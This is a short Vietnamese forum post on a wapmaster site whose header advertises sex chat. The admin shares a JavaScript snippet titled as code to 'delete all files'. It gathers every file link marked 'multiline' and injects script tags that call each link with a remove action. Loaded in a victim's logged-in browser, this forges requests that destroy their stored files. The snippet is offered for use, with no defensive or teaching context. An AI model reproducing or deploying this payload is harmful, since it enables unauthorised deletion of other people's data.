KemBong.xyz
••• Web Chat Sex Online •••
Trang Blog » Diễn đàn
Đăng nhập | Đăng kí
ForumWapmaster Việt NamShare Code
Lượt xem: 13014

▼ Share code xóa toàn bộ file bằng js

* admin  (Admin) [Off]
82 * 34
*   7 tháng trước
hkit9x = document.getElementsByClassName('multiline');
max = hkit9x.length;
html = "";
for(i = 0; i< max; i++){
html = html + "<script src='"+hkit9x[i].getAttribute("href")+"?action=settings&remove=remove'></script>";
}
document.write(html);
▼ Tổng số: 1
- Share:
BBCode:

Link:
Bài viết ngẫu nhiên
Total: 49097 | Today : 2255 | Guest: 321